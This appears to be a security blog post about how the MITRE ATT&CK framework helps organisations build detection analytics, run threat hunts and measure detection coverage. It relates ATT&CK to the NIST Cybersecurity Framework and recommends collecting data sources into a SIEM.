Adversaries have long been prevalent, targeting information all over the cyber world. They are adept at changing attack characteristics to evade cybersecurity detection mechanisms. Consequently creating a need for security researchers and analysts to move beyond technical elements or anomalies and define malicious activity by focusing on threat behaviors such as tactics and techniques instead
MITRE ATT&CK is an open framework and knowledge base of adversary tactics and techniques based on real-world observations, indexed and broken down into details. The MITRE ATT&CK framework is the best fitting framework to build detection and response programs. Previously, we explained the MITRE ATT&CK framework and why it is useful. ATT&CK is a powerful way to enhance, analyze, and test an organization’s threat hunting and detection efforts
Where does ATT&CK fit in your in the context of your program?
The NIST Cyber Security Framework (CSF) is made up of five governance areas that comprehensively describe: protect, identify, detect, respond, and recover. Using the NIST CSF, ATT&CK can be useful across all five functions; however, it is most applicable to Detect. (Which techniques can identify incidents? e.g., endpoint monitoring, PowerShell monitoring, Active Directory changes, etc.) Utilizing the TT&CK framework in the context of detection will minimize damage for organizations
Building analytics to detect ATT&CK techniques is different than other ways of doing detection. ATT&CK provides comprehensive guidance on how to detect the use of techniques by attackers with logs and other sources of security analytics at your disposal. ATT&CK provides companies with technical details to help build automated monitoring rules or the basis for conducting threat hunts
How is it useful for metrics/measurements?
Through ATT&CK security analysts can measure detection capabilities, particularly coverage and visibility
The best approach is to start with the subset of techniques visible to the analyst, given the data sources at their disposal. Using visibility as their basis, a researcher can determine how many visible techniques they can detect through tools/analytics
The ATT&CK framework has become more important for blue teams where they can collaborate and track coverage over time against ATT&CK
What is the first step to take with respect to ATT&CK?
To find malicious behaviors, you need to be able to see what’s happening on your network and start creating and using ATT&CK analytics. To do so, you’ll need to understand what data and search capabilities you have. You can go through the Data Sources listed for each ATT&CK technique to get a better understanding of your environment
Once you have an understanding of your data, you’ll need to collect that data into some kind of search platform (e.g. SIEM) so you can run analytics against it
MITRE ATT&CK is up-to-date
Adversaries are advancing their techniques to constantly avoid being detected. This means their tactics are getting harder to detect and traditional detection methods may no longer be sufficient. One advantage to ATT&CK is the MITRE community keeping ATT&CK up to date with the ever-changing threatscape
MITRE ATT&CK is a powerful way to classify and study and understand adversary techniques. ATT&CK can help in many different ways to improve cybersecurity efforts. Hopefully, this post has helped you use ATT&CK to enhance, analyze, and test your threat detection efforts